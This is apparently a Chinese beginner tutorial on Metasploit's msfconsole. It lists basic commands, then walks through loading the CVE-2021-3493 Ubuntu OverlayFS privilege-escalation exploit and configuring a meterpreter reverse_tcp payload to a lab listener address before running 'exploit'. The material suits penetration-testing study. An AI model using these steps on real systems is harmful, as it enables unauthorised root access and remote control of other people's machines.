目录
1.1、概述:
MSF终端(MSFCONSOLE)是目前Metasploit框架最为流行的用户接口,因为MSF终端是Metasploit框架中最灵活、功能最丰富及支持最好的工具之一
MSFCONSOLE主要用于管理Metasploit数据库, 管理会话、配置并启动Metasploit模块。本质上来说, 就是为了利用漏洞, MSFCONSOLE将获取用户连接到主机的信息,以至于用户能启动渗透攻击目标系统
1.2、通用命令:
help: 查看执行命令的帮助信息
use module: 加载选择的模块
set optionname module: 为模块设置不同的选项
run: 启动一个非渗透攻击模块
search module: 搜索一个特定的模块
exit: 退出MSFCONSOLE
2.1、MSFCONSOLE漏洞利用
第一步:终端启动MSFCONSOLE
以管理员身份运行
sudo msfconsole
出现msf提示符了,就登录成功了
第二步:寻找模块
使用search加上自己想找的模块(相当于模糊查询)
使用search命令搜索所有有效的Linux模块
search linux
第三步:使用模块
使用use+模块名
Ubuntu内核OverlayFS权限逃逸漏洞
use exploit/linux/local/cve_2021_3493_overlayfs
(就试一下这第一个)
第四步:查看有效选项
show options
可以看见有4个模块,且都是必须的
Current Setting(当前设置)
已经有3个已经设置了
还需要设置session
Module options (exploit/linux/local/cve_2021_3493_overlayfs): Name Current Setting Required Description ---- --------------- -------- ----------- COMPILE Auto yes Compile on target (Accepted: Auto, True, False) SESSION yes The session to run this module on Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.190.149 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
第五步:设置payload
使用set + payload名 + 设置的东西
(像这一样)
第六步:执行渗透攻击
输入exploit